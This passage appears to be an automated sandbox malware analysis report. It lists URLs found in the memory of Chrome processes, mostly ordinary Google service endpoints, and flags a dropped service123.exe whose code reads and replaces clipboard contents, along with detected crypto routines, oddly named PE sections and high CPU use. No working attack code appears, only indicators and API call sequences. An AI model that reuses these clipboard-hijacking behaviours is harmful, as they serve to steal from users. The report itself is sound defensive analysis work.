Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409707835.0000285400E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406055316.00002854006E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405716206.0000285400638000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: chrome.exe, 00000003.00000002.2409557607.0000285400DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/amp
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409404602.0000285400D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2405306663.000028540052C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-autopush.corp.google.com/
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.c
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.go
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive-staging.corp.google.com/
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/:
Source: chrome.exe, 00000003.00000002.2409293507.0000285400D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/J
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/~
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402983966.000028540000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://googleusercontent.com/
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000003.00000002.2401641939.000005FC00904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000003.00000002.2401641939.000005FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000003.00000002.2401641939.000005FC00904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000003.00000002.2401641939.000005FC00904000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000003.00000003.2373821273.000005FC0087C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918=
Source: chrome.exe, 00000003.00000002.2401589904.000005FC008D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000003.00000002.2409557607.0000285400DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409707835.0000285400E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408963284.0000285400C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408963284.0000285400C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2405306663.000028540052C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000003.00000002.2406782033.00002854007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405175677.00002854004C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000003.00000002.2406782033.00002854007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405175677.00002854004C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000003.00000002.2406782033.00002854007B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405175677.00002854004C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000003.00000002.2404100505.000028540010C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408327631.0000285400AC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000003.00000002.2409641422.0000285400E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000003.00000002.2409641422.0000285400E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404679282.00002854002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000003.00000003.2381951129.0000285400E10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408327631.0000285400AC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000003.00000002.2409641422.0000285400E1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409293507.0000285400D4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000003.00000002.2408113593.0000285400A50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000003.00000002.2404100505.000028540010C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000003.00000002.2405175677.00002854004C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000003.00000002.2406648522.0000285400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2380718468.0000285400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405005873.0000285400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2383596431.0000285400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381745231.0000285400454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000003.00000003.2381440086.0000285400CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000003.00000002.2406977156.0000285400828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/CharPk3
Source: chrome.exe, 00000003.00000002.2407736913.0000285400968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406977156.0000285400828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000003.00000002.2407736913.0000285400968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406977156.0000285400828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000003.00000002.2404124074.000028540011C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000003.00000002.2405651008.000028540060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408633079.0000285400B88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405306663.000028540052C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000003.00000002.2404545133.00002854002B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/speech-api/v2/synthesize?
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000003.00000002.2408028126.0000285400A20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000003.00000002.2402983966.000028540000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405607685.00002854005F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000003.00000002.2408941027.0000285400C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytcap
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Q
Source: chrome.exe, 00000003.00000002.2404071818.00002854000FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409404602.0000285400D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_6C1F9C22
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_6C1F9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_6C1F9D11
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 7_2_6C1F9E27

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B351B0 7_2_00B351B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_00B33E20 7_2_00B33E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C222CCE 7_2_6C222CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1ECD00 7_2_6C1ECD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1EEE50 7_2_6C1EEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F0FC0 7_2_6C1F0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C230AC0 7_2_6C230AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F44F0 7_2_6C1F44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2246E0 7_2_6C2246E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2187C0 7_2_6C2187C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2207D0 7_2_6C2207D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C230060 7_2_6C230060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C222090 7_2_6C222090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C212360 7_2_6C212360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C23DC70 7_2_6C23DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F5880 7_2_6C1F5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C2198F0 7_2_6C2198F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C227A20 7_2_6C227A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22DBEE 7_2_6C22DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22140E 7_2_6C22140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C231510 7_2_6C231510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C22F610 7_2_6C22F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C20F760 7_2_6C20F760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1E3000 7_2_6C1E3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 7_2_6C1F70C0 7_2_6C1F70C0
